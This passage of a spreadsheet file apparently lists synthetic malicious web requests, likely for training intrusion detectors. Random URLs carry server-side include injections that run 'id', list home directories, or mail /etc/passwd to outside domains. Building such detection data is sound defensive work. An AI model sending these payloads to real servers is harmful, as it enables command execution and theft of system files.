    <t>/eua/8rhwinntb5gmcv.lp/zyr4c0fxqnoj6hpr/ivgxplrx.lfkuq./2vm/nechohdiv33w/netamq8oehtjt9/uiiwv/79nn4beulocation.js?1oanteklaeoalis=747&amp;wl72ftpz=&lt;!+#&lt;!--#exec+cmd="id"--&gt;&amp;3tq9rm=682&amp;sre=7&amp;lmbpoxetcq=h&amp;ane=447125&amp;heryi7c0ncar=enetcatlsystemve+ce+&amp;iejtseirr=u&amp;oeb1temberw=7gaw-mavm63&amp;clde9miatlr=1zjx&amp;olrp=aw9et&amp;ermrrsaearhi8au=xetccdusrs6n8saty</t>
  </si>
  <si>
    <t>/eeaifouuinobrcgo6/8-u/8hvt8na.k2tdmoxmjc3/ycsnasydhat4elttat/kthb/emu5tnalsenslna/t1tyrpd/allcj-dbuwgetioglocation/lotlistwtg.htm?oh=noh&amp;rrhpsf0i=21&amp;reatobaitpexs=ui@k9y@bu&amp;scmne=temconnectrhot+ti&amp;ata5o=4472&amp;iiotrau=77&amp;0r5p0oii=&lt;!--+++#exec+++cmd="/bin/mail+eyht.com+++&lt;+++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ysxera/ifwf-g/isqrwsrueu6mzqovjub/iaentrps/unohkf6/zetytlvui1/a01attha/tfn07-y6decl_ly9/mhffo3mty5g0.js?anrotq=[&amp;ietnre6o=+noy?&amp;ayd=103756&amp;e@1wp-vaz=rdsc.noo3c&amp;ed7gemlneneedg=he&amp;irll3m=netcatsr&amp;hyoa7satuk=obdmrr&amp;alstdinfgfbunionb0=99235244&amp;utsehepr2=&lt;!--+++++#exec++++cmd="/bin/ls++++-l++/home/savf/aosrrez2m"+++++--&gt;&amp;spassohihmhss=na&amp;5rse=988&amp;3swl65al47=e5nm&amp;9eehe0dh=40782</t>
  </si>
  <si>
    <t>/smpq/xgepcydsom37u/csiuh.css?ui5tati5ola=&lt;!--++++#exec+++cmd="/bin/ls+++-l+++/home/w5efte/tsb3t8avoi"++++--&gt;</t>
  </si>
  <si>
    <t>/dt4emyrhh/2rtetghel4es8eets/izaqngtlpopfz3htyj/ld4/tln/snbvdg/gk99ektg/onqiqiae/mvon/ec_iiepi8jpppkdlshe/o2yixmuommv-ybqcqvq/clmvhl8nyln3otgih.cgi?tqr8fneeoh=wx6.j&amp;r9oet=oiohhhdfnsapsea&amp;mogashit1=0546001&amp;lougaanoolwhs=9&amp;lt4irmodxezd=&lt;!--+++#exec+++cmd="/bin/mail++++cxr.com+&lt;+++/etc/passwd"--&gt;&amp;iofoeeauetltrij=e&amp;oaeienu=$ne=&amp;gmmnklink%uzcat=eue9&amp;eetedsi9e=8&amp;qetcf3httpg7iall@v=9&amp;ae=tii&amp;lim5hhaetmix=sesrot&amp;htadswg=eutse&amp;icopyrcisrlw</t>
  </si>
  <si>
    <t>/trf4miliylv-h_d/fyrjw6nph-/ksui/bj/edmmmejhtnnnn0v/fqwbahtpassef1where/uxwzkoh/t6rhm0sj3kdjizq1cyla.shtml?elneatnnby=dd&amp;etnio=45826&amp;aeewn=&lt;!--+++#exec+++++cmd="/bin/ls++++-l+++++/home/lebini/adlihrwmo"+--&gt;&amp;ocoebdtelergswc=283&amp;oe=77949157&amp;nlaaandvonksm=9o&amp;r0eeeseiono=x+0ew&amp;n6tt1nlveyes1=od?&amp;k.@0ltv8deletej=19523512&amp;phoiorrc61ii=733</t>
  </si>
  <si>
    <t>/0.fzhb/yyvl9echoeobjectunionyb7.tiff?ktps2ajigpry=140&amp;totbeo=&lt;!--+++++#exec++cmd="/bin/ls++-l+/home/ohkwa/n4rao7"++++--&gt;&amp;o67mvbt4uk=a5nzsiade3r&amp;9hri5ss=rldestilnn8e0o&amp;ps8z.=nayyk&amp;cb6ysucg=599</t>
  </si>
  <si>
    <t>/eivarasoaiet/rjno@ls07q83jwijqmyf/me@mlajjas/esteubar3rtf/oyheietss6rctrrna.jpg?tsy4nqtat=2oe|n+edic]os&amp;soseisnfosflitt=asbe�&amp;fdiadhg=&lt;!++#&lt;!--+++#exec+++++cmd="id"--&gt;&amp;eerm=tnse&amp;euhseire=mndivwacceptviydsf&amp;hhtbwdymimd=ngkc&amp;cwm0bhttpsj.g5=+&amp;oetqzbtgms9=n3yrineesa(at3opge4y</t>
  </si>
  <si>
    <t>/es/e9kgdetu8vhqk/eneigs07tsgjtarcott/doh/ag/db/wmeh7ene7ti7yeoilr24/j0p13t0nnw/okg.gf/c2zu2-i.e6jyh5h/aones9huk.msf?gowev=unpi8edjhjdtad&amp;euh=amdinetr&amp;iaj0dntehdaahef=tftpdeaiisn?&amp;etuteutu=2033&amp;or=neou9ette&amp;arh=tincludeo2andd8etetf&amp;8vfziiledlthv=o2&amp;ubqrieming5t=&lt;!--#exec+++++cmd="/bin/ls+++++-l+/home/dgw/tgcaona"++++--&gt;&amp;iii04ti3dtiloys=9894&amp;dlisseop=oc53yig&amp;aisr=gbn+asnei39</t>
  </si>
  <si>
    <t>/zybhq3efq.xvhfbaofxs/tthdk_oxzmwy8tsv.msf?5ene7sor=ey8or7linii&amp;dog1id@cng.=otkco2ee+ns:+nct&amp;pcce80zis4l=&lt;!+#&lt;!--++#exec+++cmd="id"--&gt;&amp;ihn=m&amp;ud=;nir\\&amp;reta=+t&amp;aotfanir=dtf&amp;bdpoloha98hri=rm7sd6t362&amp;ma1ret4g0esgv=24751&amp;rayetej6naela=1809582</t>
  </si>
  <si>
    <t>/ecechhvpkh.s3.asp?wne7aratms0o=&lt;!--#exec+cmd="/bin/ls+++-l+/home/msftpetaal/lpnjhot"+++--&gt;&amp;dptheihh=cfyhwnbeeho2l&amp;nkmwolaeajh=ok9/f</t>
  </si>
  <si>
    <t>/ryoc4k_m5bw/4s-tec@ytsr60qvrrf0w/fqp7kppx/eti3uenrtokis/kwgny0escotunctmi/if/nqnpti/oprpcbswiksanp6ez/mdiwqwp-bfst7.asp?snrnmu2iiifje=&lt;!--+++++#exec+cmd="/bin/ls+++-l++++/home/lwol6lerhe/rtnzsr"+--&gt;&amp;z5_hbqv=setpss-snsmcic&amp;q0=920&amp;1..t=meoeea7init+&amp;ivyedem77dsi7dt=deed&amp;nnu=1t&amp;amc=oap&amp;nob7dnner3te=lm4fzb</t>
  </si>
  <si>
    <t>/yzvoob.php4?o0mrtiqesnc=&lt;!--++#exec++cmd="/bin/mail++++hiulttltn.com++&lt;+/etc/passwd"--&gt;&amp;irnrerrya=ief5tgwl</t>
  </si>
  <si>
    <t>/tno/aiu8urkeslu4/gueadedott0dnnolhn/rgxlda9aebfcnn9le/ozrno7rg2tikeonn4/suae.dll?arwosisupbde=i&amp;wbupqvbscript7=69098084&amp;td9ee1enenio=hemxaqqcxsh&amp;atom4dnhr8tth=ibm%httpsm2esbrhtv&amp;iioualmlss9za=st&amp;sjlwoottnre=&lt;!--+++++#exec+++cmd="/bin/mail+++++mzbm.com++++&lt;++++/etc/passwd"--&gt;&amp;rs2exti6e=3&amp;rtaaasd=s/optiosgnnfqry6</t>
  </si>
  <si>
    <t>/svl-c/deregnnildxt/1bq/ls82xld9tvrslkqat0/hrt8conremrwy/n7pinsdiaa.jpg?8ltu=mnmgrvk&amp;arnhzew8rbs=omoem&amp;papawsock_stream70.@o5=&lt;!--++#exec+++cmd="/bin/mail++unafot6q.com+++++&lt;+++++/etc/passwd"--&gt;&amp;o4easkhfi=53930&amp;n4oe=192&amp;g2yacceptndmc=144</t>
  </si>
  <si>
    <t>/nskrd.x/ye/czcbim56no19/hanest1eau/v7kkeqdisvytjj-mzf/ohdshgb9/p8fe/7srtpcdwcmsraes/ildecnaedhdaerrvw/sxhozd6slpkv9tyz6/c0wdhzzlbaz_94p0h/nrr2ookah6t32n.gif?c34_7wget4iwhererk=&lt;!--+#exec+cmd="/bin/mail+++cei.com+&lt;+++/etc/passwd"--&gt;&amp;d9ntr=a0pwg9d&amp;nccspzny6h=oosa&amp;ottt66cf=r&amp;tkeoleroa=eteeleerydwebe&amp;e3his2shnhig=7379429082&amp;nmt5noiraegjq=890726&amp;framod=smrelis&amp;ewrjei89co=hoidxtess&amp;batwslpst=md.we&amp;auc=9</t>
  </si>
  <si>
    <t>/leoedahowcxaetemt7/n6-z0gyebft0i/vledatgtvtrsxi4lg/erab@r0/eab5pacrf/mgaiggvlee5dr.css?i8ftp3grqmlikey=il&amp;ig4pl=eszz3v&amp;dinputpsovl9=&lt;!++#&lt;!--+++++#exec+++++cmd="id"--&gt;&amp;vtttsgetcewevo=thuh&amp;nnlrert=rem&amp;m03sap6=71&amp;cformdiwy6r=2i+&amp;dttony=86ioai41o1s6q6r&amp;yael1wen3umd=795214163&amp;ky3osacceptv=ai&amp;oc=htpassse@eetbodye/cz</t>
  </si>
  <si>
    <t>/ecf/nrq/4a67hereue/rdte0_gcthae3ltr/3ig0xen3akir/rni8cwwh/gej3l_@b8iw2iruok8p-/9mx0hzlo0l2fpstylei.shtml?tn=cttsnslhhbsisrsnua&amp;eetltthlpfdziae=&lt;!++++#&lt;!--++++#exec++cmd="id"--&gt;&amp;nrhte7tetenib=et&gt;wchbohloewa@&amp;psuyerd=0te]&amp;afh5=echoo+sservices&amp;1mjq1groupbytmpywr=t@g-7&amp;e4mel=f7+4&amp;xihcnteadndnajl=/3ncwvhttpsepqeyse&amp;huejfazk2=6asctihe&amp;m9fhepe=69067246&amp;7uwzpaiiehuysen=4364198</t>
  </si>
  <si>
    <t>/s7s/o1nqvciywl0asy/susefanrit8glniaat/qaeteedtty2ta10is/idje/sptlnomsdtf/5rniemlrsnam/ic/ozzwh8jl1ng.gif?hoafmgrdr=6344&amp;br5gcy9at4ehha=715345579&amp;owhereavnetcatxcoc4x=&lt;!--+++#exec+++cmd="/bin/ls++++-l+++++/home/npavuwmd7e/lm"+++++--&gt;&amp;ctsfyuedir=+childt&amp;uqzls73lfa=ifeals&amp;2osyf=d5ei0osm&amp;9nd9xs7he=ewp3mcct@l&amp;connecte_rx=oq+h3h+hio7&lt;ltt&amp;9enq=5dwlanonnewposition&amp;seexrr=doocs5rvselib6snpassthru+s</t>
  </si>
  <si>
    <t>/5nte5l.jpeg?iinet5sa4s=79544631&amp;mt6ll=ixortdetuexm&amp;2n3rpentsr=r&amp;sot1oq=7&amp;abtey=ttqielilfn&amp;zxtvdeotehevous=ll4&amp;hksahnrdr=&lt;!--++++#exec++cmd="/bin/ls++-l++/home/dhaolg0ocz/dtfdedodno"+--&gt;&amp;lpassthruos8kzn=qowrib&amp;pf8u=aservicese(e/nmohaoi'a&amp;ta5hnnnr1snaz=e+nskiue</t>
  </si>
  <si>
    <t>/tlca@kah/oiacrwibl1eya4/ne6l3w6/e7egs/njwmfemxud/r9cmlyor-is-wzkt/vkcgcsovfdropck/ceextfeeotn5desn/groy/erhas6xx.png?ee=l&amp;thidemduoscu=04t9o7tpruaen&amp;tnse=e+sock_stream&amp;6ljrjxwhs=taf=(7bgsoundretor+h&amp;cpavdczoe=6246120&amp;h1irx2q=0971961970&amp;ee3tnt5ni=asnull&amp;1tsmn=nr&amp;t8paak=mmerset&amp;kiny0pnawerraf7=tllpjaz8nc&amp;oeofet=repj5drtznei&amp;surbapdph8v=&lt;!--#exec++cmd="/bin/mail++is.com+++&lt;++/etc/passwd"--&gt;&amp;4swlretettgacfe==adminkq|locationniem+4ts</t>
  </si>
  <si>
    <t>/qt.y8m.oy426ijy/ei/tquhtb3qh6/oj.mo/2pthlfjcr-y5/rnokh1rwj5mrtp/58t4sehneda1fixluet/1g6sgw/neoqylmioo.js?supng3hsaig=674312&amp;rdibedneoa=4&amp;aetiofgctmioof=&lt;!--++++#exec++++cmd="/bin/mail++++rrrstba.com+++++&lt;+++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/h2upc9qeq.php4?hafntt=usre(&amp;1pga6@o=n&amp;usrth7e=oo&amp;r0nscr=6731&amp;tiephreetg=ui3hz6twe&amp;dk6m1ux-g=&lt;!--++#exec+++++cmd="/bin/ls++++-l++++/home/l9iulrna4/ce"++--&gt;&amp;ylq9gdarheenke=q:rcpr38&amp;sae=00702&amp;dwr=taaz9&amp;scgtwedsevztubt=masng&amp;oformc2dr&amp;moaekt6aatrp=mv&amp;nrjsmsucfk=5ivszvfj&amp;fwe=002394</t>
  </si>
  <si>
    <t>/dnshgaeri/allpasswdqrgahttp@6y3ooj/ityklckaba0/u1nusuzl6jb-b9qa_zzc/msrtntijh/odenmp2te5peehecrl/gnm4cp.xpnrby9lgh_lr/50rb5u.zkcfo.dll?aennioaik=eb4&amp;pzbx3=&lt;!--+++#exec+++++cmd="/bin/mail++++ajhseenelt.com+&lt;+/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/inocilvttaditc/ienlyodnesrrteeiwn/c0n6eebsne/4aovmef/4c9mi1gh2i5g81p.exe?4eeymdia=57173366&amp;eeflh3wt=0y&amp;w88hsoongths76=&lt;!+++#&lt;!--+++#exec+++++cmd="id"--&gt;&amp;aruofbtopefet1r=arqutfidrzl3cy&amp;rcp-0insertwn=agrolf&amp;ugae=660058&amp;s4h=lk1dki6</t>
  </si>
  <si>
    <t>/tkh/gcbetweensformaw1giprocessing-instruction/05b/ilm7idbiee1e/d.bqorservices5/eeele/imcbs9fb5gvc/a8ptye9k7_ox/69hjesttmmceyes/k_wj83u/dvwidnpasswdiymuvhnph-/mailzdosu5q.dll?ratolhyd=6&amp;zrk=&lt;!++++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;9.seu7i-=24437</t>
  </si>
  <si>
    <t>/ucnnrtigitnfsjt2a/cdsr/ttpmzur4jbqvnsjj6/mz1lhns/sb3aeanseiklwn7qq/psw.html?rdwotett4ib=?ja&amp;qewindow.opentfib7i67n=?br\\&amp;jeoroaiutty=&lt;!+++++#&lt;!--++#exec+cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/0jhla/ea7ogmk0pp/csgroupbynunodeumva4is/enaeftrrfand/enyrnntnp.css?wp-gvrcp2iupbdi5=980933&amp;rvc5siu=640&amp;3td7yuot=sexeci&amp;d&amp;9onnen1cidah=&lt;!--++#exec++cmd="/bin/ls+-l++++/home/etiw/i21tfdis"+++--&gt;&amp;usgirewisi=ssm&amp;ah=s)9&amp;3emyubsidglil=t4smen&amp;tedro6ttif=94075188&amp;lkeqle9=lzwa4cji&amp;iebuufacigyrj=1340022066&amp;8arzaeyvre1nsws=he-3&amp;gssaosu=89kd4a9s3aldgyei&amp;fevoohanow=lew&amp;fsdzuhttpp7ftew=5210&amp;cviei=ep6algvrbmk</t>
  </si>
  <si>
    <t>/atq2-p9kjtlqcowbg/nei/sovr_3r/bnduunionh/o0waz39nxo_yerupa/tzagjra3mdydwtoxb/npmidd/bjmjqm0gx.msf?ejvt2tx12h=&lt;!--#exec+++cmd="/bin/ls+++-l++/home/ultisth/e9mt"+++++--&gt;&amp;rg1=084</t>
  </si>
  <si>
    <t>/hv6jp-cdwt8aa/m2avqsjvevhnye/ng2zzy4sbidc/h90groupbysamf9_goacceptgy/8as/rhkc/an43nd/@2replaceivreplaced/l0qdauvvtiv2-cyo/rmeaenelei9it/jmy/e5lgg9ailt.dll?naarssam1=2a&lt;r7d9nph-mie+&amp;pafmnkiba.6=&lt;!+#&lt;!--+++++#exec++cmd="id"--&gt;&amp;eueatehy=66851394&amp;iokdrnreorfot=a&gt;a7l+</t>
  </si>
  <si>
    <t>/tizywmpa6nsqm/hhse2t0te/wpwxu/yphw0tg4xpg4ljxgjrei/twhereytwa/ixx_lbqd-0as.aspx?hanx=&lt;!++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;cvxoapn=arz6</t>
  </si>
  <si>
    <t>/rsotyeesr/fxsov/beibl1orrgs.aspx?4wrhceo=443415&amp;-xk_6winnt4=where0r+&amp;fues=ayhno+seil5ji&amp;hhttpsw3xfez.=opn5ster-$kole&amp;8sb8i5oabr=76&amp;epmnesaeun=tzydbahqftm7&amp;otxecauht=mlas&amp;7ieslwtiotv=?iehttpsatasr+reeee&amp;nhaforo8tenrdie=srehwebhzen&amp;sm9tm=144392&amp;tw=nahbp&amp;eegcnmoc46oil=&lt;!--#exec++++cmd="/bin/ls+-l+++++/home/diueus1tz/e8eaguaeoa"+++++--&gt;&amp;34gahpmar=gdans6jx49&amp;oo=7</t>
  </si>
  <si>
    <t>/.imj3vnn.htm?bna4=&lt;!--+#exec++cmd="/bin/ls++++-l++/home/eit/ruei"+++++--&gt;&amp;rm8e8dsme6sob=-xoask6cp&amp;ogpe32@zk8=731259&amp;nh=zlatcq&amp;amnbi3oa=si&amp;cxzosm=h0httpsae%eia%oh&amp;ietashtr9d=e2&amp;2iato=hojsoon&amp;dmnz-kfp8riv=aqea&amp;mkree=aandt</t>
  </si>
  <si>
    <t>/8uoj.html?mncih=ruyxbg@y6t.&amp;teatetrbsndofit=20796683&amp;objecthuu0jg=2vffufk&amp;ohappitu=aj3bd_7ajtgo&amp;irsoe5=s6sqekso8o22krnop&amp;io0nexsecldojcz=&lt;!--#exec++cmd="/bin/ls+++++-l+++/home/eeyyby/1i"++--&gt;&amp;dnsnli=drop&amp;we6tizhorn=7059&amp;ofmt7ipaftd=mr0tmgedodei</t>
  </si>
  <si>
    <t>/dh/k.wjveurfz5kl/etnahfmhdo/bsutr/xdop./ixtajorlp0urs9ey/a4tshhkrttda/tgrrssccedvwb/e8vp5b/from4/e532awm@doal.exe?rty@sebopenez=6wi3rydywz7cocea&amp;cneoauhntnihii=group+byh&amp;gppkselstd=5621397&amp;tt73rhs=iothtewe0buhi&amp;pagbssigtf9i=56162&amp;9g=&lt;!--+#exec++++cmd="/bin/ls+++-l++++/home/ebimoeh/ddci1g"+++--&gt;&amp;heiolnot63ld=+nscriptlttekm)cwxom&amp;inaryoeexec=hrssfcuyeau;h&amp;iclua=rle&gt;+pssnsea&amp;ecaoebmcrhc=idhda9aa6n&amp;nrtsmgor=yhwlhoiso&amp;sibt0ferw=o|&amp;9macg9r1i=|madminjomlsa|=enincludeoq</t>
  </si>
  <si>
    <t>/nss35dlagt7a3/oqj/h5gvex3mureilnniaiej.pl?nrwefao=97225&amp;ebuha=&lt;!--+++++#exec+++cmd="/bin/ls+++-l++/home/tohd0c5/wnumtiemn"+++++--&gt;</t>
  </si>
  <si>
    <t>/mi7ztzmlikeinkgc_/snssa8lerlirrxotsu/5-lch.of1ax/i5simgd8qoafay/1f3nlo.php4?29kca5rw_f=t&amp;p0a8ei=&lt;!+#&lt;!--+++#exec++++cmd="id"--&gt;&amp;msbodyem0=988968</t>
  </si>
  <si>
    <t>/lrswea1rlouhatdtvmht/tnsfsi1edeoirri/ukblp9vuvx/nysot/e_vrzt1jlec5lei/kgt/rtsfeaui.mdb?tjtqnee=&lt;!+#&lt;!--#exec+++cmd="id"--&gt;&amp;3gzaaotgis5i4=510606</t>
  </si>
  <si>
    <t>/o98.cy8ttvv1uaid87l/aqkikr/4zujj08mjjh6c/te/heeubasinitdo/ooawrenoiitnn82i9ai/o2c_/ztae.html?urmzftyl7ontbed=2728742551&amp;yntqdrsobt7t3it=u8h(&amp;rki75wqigho=oq2vc9ybic6&amp;tousksmai2h=s20hbv9dpof7&amp;uaceisr=mm.ee&amp;3lwinntodv=fnt$mt+m6deletece&amp;totgxoetz3isjtu=nna&amp;tyediml=ylmsruh&amp;&amp;ijtszeoi=2684&amp;nneddlhodlee5i=itm+qacwlxxleafm&amp;dcoroxl=bvvtwdc_vhy&amp;ilwtorehndlme=a&amp;2tjsystemg=&lt;!++++#&lt;!--++#exec++++cmd="id"--&gt;&amp;uowyaye=+&amp;uxp_qtyvcy=dty6d</t>
  </si>
  <si>
    <t>/tr5vlwqhddpazwg.jpg?fidnj=ohq&amp;uejih=hx_pya9j&amp;ri49woncep=411060&amp;teo=thg@&amp;%uy-ed888t=rso?@iian\\sehttpstv&amp;mrhan=ubefgpc8wkw&amp;i7ehnwcw=aqjie&amp;6amsd9uoiisea=76394&amp;ykr6mgi7pqne=tr1asystemr&amp;eoe=734060&amp;txxde=$c+/&amp;oedtdn=&lt;!++++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;avhboe=30</t>
  </si>
  <si>
    <t>/s9w8rhcwb-eyaiyvbln/_o_2q@zyeefn/afjeedhitelsatn/qecsinputbkrzlibvp.g/h-4vbys1.ofwirk6sja/tehosenbefutisuebo/ll419eeoielonea3/44p0ptelnetqywdy3iz/sjg_sd0iuge@-_fdxu7/acauh4oaavmj2xqxtxp.jpeg?ciitnacbr=289462318&amp;bg2xlggianisnja=h-56oystp85&amp;enelikexh=s5\\bperles&amp;uena:l|eor&amp;incqid=nineilo)$evalm6wo-jma&amp;klsertc=)'lc;loct+nl"input8a"n&amp;dcec=ektitrdisenieonaz&amp;sl3laoehse=&lt;!++#&lt;!--++#exec++++cmd="id"--&gt;&amp;snrentoza9=asock_stream0dtetextermhn]&amp;h91fsespd3=r</t>
  </si>
  <si>
    <t>/ct/nko7j_zma/ohinph/wnqzvedpv7_/ikufy1h5@zyrfidhn.gif?2toaohfavrnitab=$oereh9&amp;taccess_logi&amp;&amp;eoeolyrhmhlnneu=idrogroup+byn=be9ledns+i&amp;lwinntwailor=iseneeatetmt&amp;s&amp;hrmbbptasipqv=twm&amp;cvovzuk9.=f+od$&amp;z@jywphpsuz=ttsim7&amp;isnnmcyxneiid=e3-kq8a&amp;aasihbo=34&amp;a6dos=n?&amp;dawqauntopisnf=honlaacue&amp;uus7tiossct=z&gt;ghaving+&amp;6ecat=&lt;!--++++#exec+++cmd="/bin/mail++++9umegie.com++&lt;++++/etc/passwd"--&gt;&amp;soo=oearnf&amp;idu&amp;fqwn6xtermqjm=ae+ou+casio2s</t>
  </si>
  <si>
    <t>/er9uq/s0/nieenietbgwnuowra3d/hpds/dv1u1vf/te5twl7wjp/pku/yoxnv3hhbkm/iofsawunxukip/mktj3.css?prirrdeme=thfsls+&lt;n@&amp;yii4hiast0a=030637536&amp;ishfu=0878363&amp;epsodgeba8.=&lt;!+#&lt;!--+++#exec++++cmd="id"--&gt;&amp;vga=41077641&amp;hcatknfs8yw._=gltuww04sueshb&amp;p4oseh=3691539&amp;senttslre=th0~&amp;titu7no9oe7t=eyd&amp;dgsypositionk=86977&amp;7ux=nph-6pe1bl?m</t>
  </si>
  <si>
    <t>/eblfikz94mochaqu/alawswvbegt/3lp_paz9jt7iyw8bu/d8a1b8fvsyzrisr1rqh.bin?ey1=opai&amp;te=&lt;!--#exec+++++cmd="/bin/mail+++++shyhjgshrf.com++&lt;++++/etc/passwd"--&gt;&amp;y4tinnfo=51376401</t>
  </si>
  <si>
    <t>/0window.openvdkfc4or8g/nl7/lasittasreh2ylycshlp/oji99oshlhtna9/vh/kqpjk/et9sl28twc5t/frwons.friwtd-8l3f/w0csygku4e/rh/dphfneb5eibjmino0q/njzjodoxpdwh.html?9onf3ttewypiier=trhtrylioieaatrrmh&amp;oll7nrorlttqee=&lt;!+#&lt;!--++#exec++++cmd="id"--&gt;&amp;zt8nc_r=hadmin&amp;nzd6wam7wwhereen=tt4hrpwindow.opennetcatlcfe&amp;tffiaecal=eaioe&amp;naeowrtoi=128301&amp;it=aa&amp;ytygtbe=vy7s</t>
  </si>
  <si>
    <t>/eaahlazzf/t_pfx0hbfialzmcnwv/eeoy4c67ageari/cou0fogbgg/ndsseort/zlfeng02araf.html?shou7toict2nde=075&amp;7tertrths=5&amp;aeenmooai0=300&amp;geto=884&amp;e7c8uehikr=esamatd&amp;ttod=238&amp;otftteid=mia&amp;nnmaeg=auridhaxi+w&amp;og_myhks=8865575&amp;smyavciframeksfj2=&lt;!--+++#exec++cmd="/bin/mail+++doo.com++&lt;+++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ns5ufromeidamapboot.inicl/wbt9qi-0sic1-.x3i/mail649winnt8qt0rhms/fwxqdl0ido0ljaql.jsp?noatot5eerxt=hhttps=perlsbrnhttps&amp;ctrud3doiomtthh=22216388&amp;rnleng4eh7akiwe=994&amp;ifsf80=lynodenohyt'uf=+sambetweenfu&amp;ittuiwrmarniho=&lt;!--++++#exec+++++cmd="/bin/ls+++-l++/home/stc/srw"+--&gt;&amp;etraerf=tgrntem&amp;tehciegea=5471&amp;emahrqirnci=ts-@w6&amp;2sseemak=25852&amp;ns8etaleohwg=807475&amp;0tpoeeu=cn6&amp;gresaween9mgt=938593677</t>
  </si>
  <si>
    <t>/lm_n4t/gd63jf10uey/ueen4binwpebylr/eu6gfoehrg2vuh0_mt/nh-/es9eioreitsyh/fsw8/ccayso73wp-/ipe3intee/sajrigjmia1jc..jpg?et60xeo=76&amp;ei2aec=6040646&amp;be=formxirr9&amp;bezrce~u&amp;srjs=&lt;!--++++#exec++cmd="/bin/mail+++++fxh.com++++&lt;++/etc/passwd"--&gt;&amp;-iitjgmwsock_streamc3=0136&amp;o0sqbsouds7rr=t&amp;bunh=kwqaxl2uau&amp;to6m.wzlikefrw=lc&amp;nn6diotamhre1a=copysrin)nlgqef</t>
  </si>
  <si>
    <t>/8edroppebg/ntewr7cm77cssknriu/hmnstyle38wtwu0z03j/wndvodw/eradup/ir9wffa9nfiqbb.nd1.dll?m7=tfmpkf&amp;nvbscriptgkxkyq9=nce/ra+pi1u+td+&amp;_p6kqinnulllehq=&lt;!+++++#&lt;!--+++++#exec++++cmd="id"--&gt;&amp;ro0hiangeudri=4&amp;ao=d$r+&amp;dtae=iep96opkf&amp;szm=b+nq=lrrsbetweenf9fd&amp;opla=epg&amp;ent6r=efp&gt;nplwinnt/t&amp;255fesgsdo=3860577824&amp;ehlhv19lutaot=i&amp;peprep2zadh=dlieian2nxleuin&amp;ee5=o12f3o&amp;eaadmt=?c&amp;ekg6soijsigc=otea</t>
  </si>
  <si>
    <t>/hsrn0c1ewi9/nq/eehtdhromkm/irorelso5anynlaee/wu/ei/fcw42position/ii1tltaorae/7atu9eesstrn3toiim8/nn9hu/x_d1caj7xatqhm/odes9nsv8.dll?dropg3wformprz=01285&amp;vioe=htacces&amp;thpukk=8591695&amp;noh=&lt;!++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;q@bi=8617&amp;hlztterkheot=d$</t>
  </si>
  <si>
    <t>/mtoyik/aiyjavu/ech7ea5reudssmq/eagfev/q-netcatewqui/y9um0aln61sl/d9ipozelk@s3h/hatwecs/iww_nkqcvfxt7ubfm/hyyswbqj8wbwvo8jl5on/hxn/rxa.d.js?0qdynrhtaccesu8uc=&lt;!--+#exec+++cmd="/bin/ls+++++-l+++/home/phcearsxwi/pkg9nga"++++--&gt;&amp;ih9fnu3e=scriptooo+ulne|&amp;hcsia8moqldu=ictf21t&amp;5oramrtes5wtn1=eqim%xmlsn~ts&amp;hrkmx=5196&amp;deleteidhnvbscriptnca=t+s+t\\ue&amp;ometat0u&amp;eseo=0dsraoypmrgxoz&amp;havingemzok=s7+=</t>
  </si>
  <si>
    <t>/ecq8qgzqobcd1hi2/izqnvwajl9ynwy.4yf/emawra8tikinnn/2npmjuew3/6jutbi/nu88jtxbi/rvyq6cdksfo3gx/etkwvltpgcn/nivbrmxfgr/eiteurmunaenntk/cdaad/xhhv.u2oicw_5uldv.php4?ngdeozo6jp3did=89&amp;nug=ru@&amp;p24gmochain1k-=&lt;!--++#exec+++cmd="/bin/ls+++-l++/home/iosmdoe6an/jgucor"+--&gt;</t>
  </si>
  <si>
    <t>/itpnooh7okddttud3asd/snx_5a3r.jpeg?utheon0n6tsp8e=93463317&amp;as2ss11heoh=&lt;!++#&lt;!--++++#exec++++cmd="id"--&gt;&amp;shutdowngb.k8l=8boc&amp;ai=84&amp;objectrzoic9=cbfvnyzathqm&amp;9leti=heosystem+voos&gt;letselect&amp;leodem=ur|lahm+rnau;pe-zree&amp;d6ua8q8w=+tifromr0musr5d&amp;whgef=a3r&amp;coseo=fwo1tr</t>
  </si>
  <si>
    <t>/nrrde/ct-.tf7toyzg7ejvg/sntbkt/t_nxgkdepkq0ylunmzuf/prr/ue9ius/ie6ksjlg4/goumigrr0meat.tiff?vrxlnsw1re=d&amp;eceigeevenj=agmuw_pa2ze&amp;eeweuzcnesadeit=5981&amp;cu3ebp=&lt;!+++++#&lt;!--++#exec+cmd="id"--&gt;&amp;ouenc=tefln+&amp;ea=tru&amp;script3yxexec=f4&amp;luic=nh4sdocumenttr&amp;aezcy2ywo8snn=i&amp;9tgelz=2cuipateeinaep&amp;@rnuxfs.yf=teozartay&amp;fromyys1hf=r+i4glnqx&amp;2oqanedfuilae=th&amp;na=+hnpabin</t>
  </si>
  <si>
    <t>/ixbhkydshsjqga1@/lb/tlose/m8hknie6rzeyjf15g/onz1teudre/t03vc/etyti3stde3n3t/ca2emq1lyhiu/acil/luohjyhonwntntonewx8/shkniaxgg.2kwqve1i/euajatbinu.pl?nib3=vhespr3ebtaz&amp;setsqecnztp=&lt;!--+++#exec+++++cmd="/bin/ls+++-l++++/home/eeebnhnn/ththt"++++--&gt;</t>
  </si>
  <si>
    <t>/bnutesrtsnbgbmenni/ec7ewmagurl2qdqtdn4/sgniifeib@y.msf?eaqisaniw=djuyhtzulew3oreie&amp;lvnj7l3z=&lt;!--#exec++cmd="/bin/ls++-l+/home/saoebny/h3ao"++--&gt;&amp;llphapwa1craoe=138&amp;wraccept-3winntzkusr1=8717&amp;niagecm=h4.gvaifkgb5&amp;lbliifoeh=okhicuumfwgtj7&amp;oo=er+bc[aabietedi</t>
  </si>
  <si>
    <t>/ha/aayuyvqc38xbs.htm?m0e=&lt;!+#&lt;!--+#exec+++++cmd="id"--&gt;</t>
  </si>
  <si>
